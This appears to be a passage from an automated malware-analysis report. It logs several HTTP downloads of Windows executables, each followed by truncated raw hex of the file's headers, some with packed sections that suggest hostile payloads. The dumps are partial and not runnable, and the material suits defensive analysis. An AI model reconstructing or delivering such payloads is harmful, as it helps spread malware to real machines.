Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Sep 2024 13:34:10 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Tue, 24 Sep 2024 12:56:26 GMTETag: "1c0200-622dd088a9fca"Accept-Ranges: bytesContent-Length: 1835520Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 2f ba f1 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 70 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 69 00 00 04 00 00 36 44 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 29 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 63 6f 72 7a 68 61 6f 00 a0 19 00 00 c0 4f 00 00 9e 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 6b 78 66 65 61 63 64 00 10 00 00 00 60 69 00 00 06 00 00 00 da 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 69 00 00 22 00 00 00 e0 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Sep 2024 13:34:30 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Tue, 24 Sep 2024 13:27:18 GMTETag: "e1000-622dd76ee470c"Accept-Ranges: bytesContent-Length: 921600Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 2e be f2 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 60 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 0e 00 00 04 00 00 4d 44 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 2c a5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 2c a5 00 00 00 40 0d 00 00 a6 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 f0 0d 00 00 76 00 00 00 9a 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Sep 2024 13:34:40 GMTContent-Type: application/octet-streamContent-Length: 1873408Last-Modified: Tue, 24 Sep 2024 13:28:16 GMTConnection: keep-aliveETag: "66f2be70-1c9600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 40 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 60 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 4a 00 00 04 00 00 08 3e 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 4a 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 49 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 6e 72 65 66 64 6d 76 00 80 19 00 00 d0 30 00 00 7c 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 65 6b 66 74 74 61 6d 00 10 00 00 00 50 4a 00 00 04 00 00 00 70 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 4a 00 00 22 00 00 00 74 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Sep 2024 13:35:03 GMTContent-Type: application/octet-streamContent-Length: 320000Last-Modified: Wed, 11 Sep 2024 19:08:04 GMTConnection: keep-aliveETag: "66e1ea94-4e200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 67 e5 e1 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 d8 04 00 00 08 00 00 00 00 00 00 5e f7 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 f7 04 00 4b 00 00 00 00 00 05 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 0c 00 00 00 d8 f5 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 d7 04 00 00 20 00 00 00 d8 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 00 05 00 00 06 00 00 00 da 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 05 00 00 02 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 f7 04 00 00 00 00 00 48 00 00 00 02 00 05 00 68 e8 04 00 70 0d 00 00 03 00 02 00 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 49 98 c5 eb e4 07 3d 4e 57 c4 94 0e b8 53 b5 28 8c a4 60 7d 43 e0 bd be a1 50 3f 32 96 e1 7f 68 ee 09 6c 85 3c 41 15 49 09 ba d4 fa f6 43 4e bc b8 ee c3 2f 99 75 8f 13 54 98 eb 94 d5 14 eb ae 0f 0f 40 0b 24 ba 30 ac ba 72 e4 aa c5 d3 22 5f 38 29 4c a5 93 97 73 a9 59 51 ec 11 25 fb 2f 3f dd c0 ca 4c 9f a3 37 65 26 5b d4 7a e2 92 dd eb bd c1 ae 2a 12 e3 6a 2e 9a 38 4a cb f5 ec b2 73 6e a8 3d e2 e0 4f dc a1 c9 e4 7c b2 90 d7 6e b7 f6 87 10 17 67 55 44 47 b4 ac 48 4b 1b 0e e4 87 e2 52 05 54 dc fa e9 31 4c 7a ca d5 dd 7f 0d 46 b5 7f 5e 6c ca b6 79 a8 7b 4a 80 90 42 7c 80 f8 ad 60 9f 6f 48 f3 8c 33 c5 fb 13 ac f3 56 4e d2 d8 66 94 7d 4a 06 87 f6 2f bf 3f 7f b6 89 bf dd e0 a0 b3 da b3 34 6e 45 85 53 86 a8 f1 e1 33 41 b1 d3 72 04 4d 9e 7f 71 66 e7 05 7b 8b 08 d6 a9 8b fd 21 49 55 07 c8 2f b1 4d 85 3f 3e f0 02 88 e8 08 a2 30 e7 65 94 96 58 16 66 e9 0b b0 69 09 55 69 17 02 ad cf a0 60 fc 77 be 88 66 61 b4 fe 4c 77 69 b7 56 4d a0 69 e1 34 ac d
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Sep 2024 13:36:04 GMTContent-Type: application/octet-streamContent-Length: 192000Last-Modified: Sat, 24 Aug 2024 14:58:01 GMTConnection: keep-aliveETag: "66c9f4f9-2ee00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 98 e0 c8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 90 64 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 24 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d8 a9 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 23 00 80 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 4a c6 01 00 00 10 00 00 00 c8 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 ee ce 00 00 00 e0 01 00 00 d0 00 00 00 cc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 94 2b 21 00 00 b0 02 00 00 0c 00 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 2a 44 00 00 00 e0 23 00 00 46 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Sep 2024 13:36:18 GMTContent-Type: application/octet-streamContent-Length: 4278784Last-Modified: Thu, 12 Sep 2024 13:56:06 GMTConnection: keep-aliveETag: "66e2f2f6-414a00"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 ba 08 00 00 8c 38 00 00 00 00 00 4c c9 08 00 00 10 00 00 00 d0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 41 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 10 09 00 78 22 00 00 00 20 0a 00 00 82 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 40 b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 09 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 94 b9 08 00 00 10 00 00 00 ba 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 20 2d 00 00 00 d0 08 00 00 2e 00 00 00 be 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 01 0f 00 00 00 00 09 00 00 00 00 00 00 ec 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 78 22 00 00 00 10 09 00 00 24 00 00 00 ec 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 40 09 00 00 00 00 00 00 10 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 50 09 00 00 02 00 00 00 10 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 40 b5 00 00 00 60 09 00 00 b6 00 00 00 12 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 82 37 00 00 20 0a 00 00 82 37 00 00 c8 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 41 00 00 00 00 00 00 4a 41 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Sep 2024 13:36:54 GMTContent-Type: application/octet-streamContent-Length: 506368Last-Modified: Tue, 10 Sep 2024 19:10:31 GMTConnection: keep-aliveETag: "66e099a7-7ba00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 06 99 28 de 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 3e 06 00 00 7a 01 00 00 00 00 00 3e 5c 06 00 00 20 00 00 00 60 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 08 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f0 5b 06 00 4b 00 00 00 00 60 06 00 b0 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 3c 06 00 00 20 00 00 00 3e 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b0 76 01 00 00 60 06 00 00 78 01 00 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 07 00 00 02 00 00 00 b8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 5c 06 00 00 00 00 00 48 00 00 00 02 00 05 00 34 53 03 00 04 a6 02 00 03 00 00 00 d7 04 00 06 38 f9 05 00 be 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 00 00 2e 28 03 00 00 06 28 04 00 00 06 2a 1e 00 28 fd 04 00 06 2a 1e 00 28 01 00 00 06 2a 1b 30 09 00 ce 05 00 00 01 00 00 11 00 73 0d 00 00 0a 0a 00 00 02 7e 05 00 00 04 25 3a 17 00 00 00 26 7e 04 00 00 04 fe 06 26 00 00 06 73 0e 00 00 0a 25 80 05 00 00 04 28 01 00 00 2b 6f 10 00 00 0a 0b 38 5b 05 00 00 07 6f 11 00 00 0a 0c 00 08 17 17 1a 8d 0b 00 00 01 25 16 1f 46 7e 1c 03 00 04 28 b6 05 00 06 a2 25 17 1f 47 7e 1c 03 00 04 28 b6 05 00 06 a2 25 18 1f 48 7e 1c 03 00 04 28 b6 05 00 06 a2 25 19 1f 65 7e 1c 03 00 04 28 b6 05 00 06 a2 7e 1d 03 00 04 28 ba 05 00 06 0d 00 09 6f 12 00 00 0a 13 04 38 d4 04 00 00 12 04 28 13 00 00 0a 13 05 73 1a 00 00 06 13 06 00 73 dd 03 00 06 13 07 11 06 7e 14 00 00 0a 7d 02 00 00 04 7e 14 00 00 0a 13 08 00 11 06 11 05 73 15 00 00 0a 28 16 00 00 0a 6f 17 00 00 0a 7d 02 00 00 04 11 06 7b 02 00 00 04 1f 49 7e 1c 03 00 04 28 b6 05 00 06 6f 18 00 00 0a 13 09 11 09 39 15 00 00 00 00 1f 49 7e 1c 03 00 04 28 b
